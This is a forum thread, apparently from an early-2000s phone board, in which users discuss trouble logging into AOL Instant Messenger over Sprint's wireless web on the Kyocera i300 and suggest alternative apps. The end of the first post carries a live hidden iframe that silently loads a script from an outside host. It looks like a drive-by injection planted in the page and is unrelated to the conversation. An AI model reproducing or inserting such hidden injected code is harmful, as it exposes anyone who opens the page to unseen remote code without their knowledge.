sprint web and AOL IM

I successfully logged on aol IM using my sprintweb. I tried to log in again, and it took too long so I cancelled it. Now I can't log back on at all to IM. Any one have any experince to help me out?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sprint WAP is a pain

From my experience, dealing with the Sprint WAP and instant messenger is a real pain. Chris, a fellow i300 board member, and I wrote a service that really simplifies the whole instant messenger thing. yes - i have used sametime.. its pretty much like AOL IM... but mostly used in the corporate environment.

AOL Instant messanger on I-300

I'm sure this topic is buried elsewhere on the board... but I'm new so I thought I would ask ..

I am very frustrated with the built in AOL Instant Messanger app that's in the wireless web menu.

Is there a better one out there? I downloaded the one from palm.com but when I tried to run it, says it only works on the M705 palm model.

I am frustrated with this because this is such an advanced phone, and I'm in love with it, but I hate how I have to re-log in every time someone sends me a message in order to see it.. what a waste of airtime.. And I have to use airtime when I'm typing a message... Why can't they use SMS for AOL instant messanger??

Any thoughts, or suggestions, comments, coming-soon apps, etc???

Yes, I got mine from AOL. It's better than Sprints version, just go to AOL Mobil and download it!

yes this topic has been discussed in several threads for your viewing pleasure. next time please search as your question has most likely been answered...

there is a good app listed earlier in this thread, called Aim Forwards... pretty good app from what the folks on here have said. the developer is a member of this board so if yohu have any questions, then SEARCH for the thread on it (AimForwards) and read the discussion.
